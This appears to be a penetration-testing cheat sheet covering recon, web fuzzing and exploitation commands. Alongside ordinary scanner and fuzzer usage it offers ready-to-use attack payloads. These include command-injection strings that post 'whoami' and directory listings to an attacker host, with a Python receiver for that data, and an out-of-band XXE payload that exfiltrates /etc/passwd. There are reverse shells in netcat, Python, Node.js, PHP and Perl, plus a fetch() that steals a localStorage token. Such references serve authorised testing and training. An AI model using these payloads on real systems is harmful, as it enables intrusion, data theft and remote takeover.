Using Host for Recon checking zone transfer.¶

host -t ns URL | cut -d " " -f 4

Recon with Ping¶

Can help Identify a box based on the ping response

TTLs¶

128 = windows
64 = some type of nix
60 = mac
255 = solaris

Commands¶

for i in {2..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done

for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done | awk '{ print $1 }'

for i in {1..254} ;do (ping -c 1 192.168.28.$i | grep "bytes from" &) ;done | awk '{ print $4 }' | sed 's/://g'

Nmap Scripts¶

Located in /usr/share/nmap/scripts
Example, show all possible smb scripts.

ls -la /usr/share/nmap/scripts | grep "smb*"

nmap -sT -Pn -T5 192.168.23.100 -p80 --script http-enum
nmap -sV -Pn -T5 -p22 127.0.0.1

NMAP Scanning with Proxychains ( Internal IPs)¶

proxychains nmap -Pn -T5 -sT IP -p 80 --script http-enum
proxychains nmap -sC -sV -oN HOST-initial-Nmap IP

Using SMBClient to Connect to a Remote Host¶

proxychains smbclient //IP/SHARE -U=DOMAIN/USER
smbclient //IP/SHARE -U=DOMAIN/USER

Fuzzing with Wfuzz¶

Directory discovery¶

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404,301 "$URL/FUZZ/"

Authenticated directory discovery¶

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 -b "PARAM=value" "$URL/FUZZ/"

File discovery¶

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 301,404 "$URL/FUZZ"

Authenticated file fuzzing¶

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 301,404,403 -b "PARAM=value" "$URL/FUZZ"

Parameter discovery¶

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404,301 "$URL/FUZZ=data"

GET parameter values¶

wfuzz -c -z file,/usr/share/seclists/Usernames/cirt-default-usernames.txt --hc 404,301 "$URL/index.php?parameter=FUZZ"

html_escape fuzzing¶

wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt "$URL/FUZZ"

Gobuster¶

Endpoint discovery¶

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

Subdomain discovery¶

gobuster dns -d $URL -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Hakrawler¶

Crawling¶

echo "$URL" > urls.txt
cat urls.txt | hakrawler

Testing vulnerabilities¶

Serve files from Kali¶

Create folder mkdir payloads
Add files to folder that you want to serve to target machine
cd to the created folder
Execute command to start serving the files:
```
python3 -m http.server 80
```

XSS¶

wfuzz -c -z file,/usr/share/seclists/Fuzzing/XSS/XSS-Jhaddix.txt --hh 0 "$URL/index.php?id=FUZZ"

SQL Injection¶

submissionData=Data+goes+here.&passCheck=on&zipPass=test;curl+http%3a//192.x.x.x:5555+-X+POST+-d+$(echo+"$(pwd+%26%26+whoami)"|+base64)
submissionData=Data+goes+here.&passCheck=on&zipPass=test;curl+http%3a//192.x.x.x:5555+-X+POST+-d+$(echo+"$(ls)"|+base64)

#!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
import base64

class S(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
        self._set_response()
        self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))

    def do_POST(self):
        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
        post_data = self.rfile.read(content_length) # <--- Gets the data itself
        print(base64.b64decode(post_data.decode('utf-8')).decode("utf-8"))

        self.wfile.write("POST request for {}\n".format(self.path).encode('utf-8'))

def run(server_class=HTTPServer, handler_class=S, port=8000):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info('Starting httpd...\n')
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...\n')

if __name__ == '__main__':
    from sys import argv

    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()

Fuzzing GET parameter¶

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "$URL/index.php?id=FUZZ"

Fuzzing POST parameter¶

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u "$URL/index.php"

sqlmap GET parameter¶

sqlmap -u "$URL/index.php?id=1"

sqlmap POST parameter¶

Copy POST request from Burp Suite into post.txt file

sqlmap -r post.txt -p parameter

Directory Traversal¶

Fuzzing LFI default file paths¶

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hh 0 "$URL/index.php?id=FUZZ"

Fuzzing LFI app specific files¶

Create two wordlists: 1. Containing paths (paths.txt): ../ ../../ etc. 2. Containing custom files related to the web technology used (files.txt): application.properties applitcation.yml

wfuzz -w paths.txt -w files.txt --hh 0 "$URL/index.php?id=FUZZFUZ2Z"

XXE¶

Fuzzing XXE¶

Wordlist to use in Burp Suite Intruder for fuzzing XXE: /usr/share/seclists/Fuzzing/XXE-Fuzzing.txt

Out-of-Band Exploitation¶

Create file named xxe.dtd with content:

<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://[kali-ip]/out?%content;'>" >

Serve file with http

Insert file in payload

<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://[kali-ip]/external.dtd"> 
%base;
%external;
%exfil;
]>

Check incoming requests

Note that extracting file with multiple lines may not work due to encoding issues.

Server-side Template Injection¶

Fuzzing SSTI¶

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Command Injection¶

Fuzzing command injection¶

wfuzz -c -z file,"/usr/share/payloadsallthethings/Command Injection/Intruder/command-execution-unix.txt" --sc 200 "$URL/index.php?parameter=idFUZZ"

Setup reverse shell listener¶

nc -nlvp 4242

Reverse shell Netcat¶

/bin/nc -nv [kali-ip] 4242 -e /bin/bash

Reverse shell Python¶

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[kali-ip]",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse shell Node.js¶

echo "require('child_process').exec('nc -nv [kali-ip] 4242 -e /bin/bash')" > /var/tmp/shell.js ; node /var/tmp/shell.js

Reverse shell PHP¶

php -r '$sock=fsockopen("[kali-ip]",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("[kali-ip]",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("[kali-ip]",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("[kali-ip]",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("[kali-ip]",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Reverse shell Perl¶

perl -e 'use Socket;$i="[kali-ip]";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

IDOR¶

Static file IDOR¶

wfuzz -c -z range,1-100 --hc 404 "$URL/index.php?doc=FUZZ.txt"

ID based IDOR¶

wfuzz -c -z range,1-100 --hc 404 "$URL/index.php?doc=FUZZ"

Brute forcing¶

Users discovery¶

wfuzz -c -z file,/usr/share/SecLists/Usernames/top-username-shortlist.txt --hc 404,403 "$URL/login.php?user=FUZZ"

Password discovery¶

wfuzz -c -z file,/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --hc 404,403 -d "username=admin&password=FUZZ" "$URL/login.php"

SQL Injections¶

Sqlmap –u https://local.host/login --method POST –data “firstName=FUZZ&lastName=FUZZ” -p “firstName,lastName” --current-db 
//Use -D for specific db and -T for specific table, and then use --dump flag to pull everything

hydra -L {usernameList} -P {passwordList} 127.0.0.1 http-post-form "/login:username=^USER^&password=^PASS^:Failed Login Message"
//Use -l for specific username and -p for specific password

Steal Local Storage Token¶

fetch('http://ip-attacker:8080/session?'+encodeURIComponent(localStorage.token));